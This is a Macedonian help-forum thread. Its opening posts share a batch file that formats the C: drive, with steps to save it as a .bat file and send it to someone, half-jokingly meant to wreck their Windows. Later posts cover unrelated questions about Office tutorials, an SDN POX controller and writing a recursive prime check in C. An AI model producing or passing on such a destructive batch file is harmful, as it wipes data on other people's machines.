Помош: Општи прашања, совети, трикови..

Ова ти е беч команда за форматирање на C партицијата

@echo off
format C: /FS:NTFS /X /Q

Вака значи темата ја отварам за разговор оклу Batch.Мене ми треба помош оклу Batch ми треба дефиниција.

значи сакаш да направиш Batch-програмче, и да му го пуштиш на некој и да му сјебиш Windows ? да му форматираш C ? :D хаха xD

Не ми ја извршва командата за формат ај ако сакаш напрај го фајлот за формат и за рестарт.

Отвори notepad,

@echo off
format C:

зачувај го како .bat документ и отвори го после за да почнат да работат командите и моеш да го праќаш.

позз

Ај ако има некој да ми дај линк од мк туторијал за Офис 2007 или 2010 би му бил благодарен

има некој шо се разбира SDN, POX контролер поточно правам, ми треба помош?

Имам едно прашање. Дали има некој начин/шема што ќе ми ја олесни работата обична функција да ја претворам во рекурзивна? Или некоја постапка за полесно да дојдам до рекурзивната функција од нула?

Конкретно сега имам обична функција што проверува дали бројот е прост или не, ама ми треба функцијата да ја претворам во рекурзивна. За Ц се работи.

Конкретно сега имам обична функција што проверува дали бројот е прост или не, ама ми треба функцијата да ја претворам во рекурзивна. За Ц се работи.

Имаш готови примери за прости броеви, види овде.

Имаш готови примери за прости броеви, види овде.

Да, ама со готови примери малце потешко ќе ја совладам рекурзијата. Мислев ако има некој совет, нешто, за сам да пробам да дојдам до неа.

Фала сепак, ќе биде и ова од помош. :)

Kajgana Shop

Back
На врв Bottom